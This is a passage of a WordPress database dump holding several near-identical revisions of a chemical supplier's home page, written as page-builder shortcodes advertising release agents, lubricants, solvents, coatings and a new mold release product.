chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:55:53', '2016-09-11 15:55:53', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1496, 1, '2016-09-11 15:56:13', '2016-09-11 15:56:13', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="5px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:56:13', '2016-09-11 15:56:13', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1497, 1, '2016-09-11 15:56:33', '2016-09-11 15:56:33', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="1px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:56:33', '2016-09-11 15:56:33', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1498, 1, '2016-09-11 15:59:31', '2016-09-11 15:59:31', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:59:31', '2016-09-11 15:59:31', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1499, 1, '2016-09-11 15:59:48', '2016-09-11 15:59:48', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="1px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:59:48', '2016-09-11 15:59:48', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1500, 1, '2016-09-11 16:00:47', '2016-09-11 16:00:47', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="1px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col 